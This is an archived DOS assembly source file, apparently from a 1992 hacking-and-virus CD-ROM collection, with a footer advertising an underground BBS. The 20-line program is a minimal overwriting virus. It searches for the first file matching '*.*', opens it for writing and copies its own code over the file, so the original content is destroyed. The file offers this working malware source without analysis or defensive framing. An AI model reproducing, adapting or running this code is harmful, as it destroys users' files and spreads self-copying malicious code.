home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / SOURCE.ZIP / 30.ASM < prev    next >
Assembly Source File  |  1992-10-11  |  1KB  |  27 lines

  1. code            segment
  2.                 assume  cs:code,ds:code,es:code,ss:code
  3.                 org     100h
  4. main            proc    near
  5.                 mov     dx,offset(nev)         ; offset to '*.*'
  6.                 mov     ah,4Eh
  7.                 int     21h                    ; find first
  8.                 mov     dx,009Eh
  9.                 mov     ax,3D01h               ; writing
  10.                 int     21h                    ; open a file
  11.                 mov     bx,ax
  12.                 mov     ah,40h
  13.                 mov     cl,offset(nev)-100h+4  ; byte-szam
  14.                 mov     dx,100h
  15.                 int     21h                    ; write to file
  16. nev: DB         '*.*'
  17. DB              0h
  18. main            endp
  19. code            ends
  20.                 end     main
  21.  
  22. ;─────────────────────────────────────────────────────────────────────────;
  23. ;──────────────────> and Remember Don't Forget to Call <──────────────────;
  24. ;────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────;
  25. ;─────────────────────────────────────────────────────────────────────────;
  26.  
  27.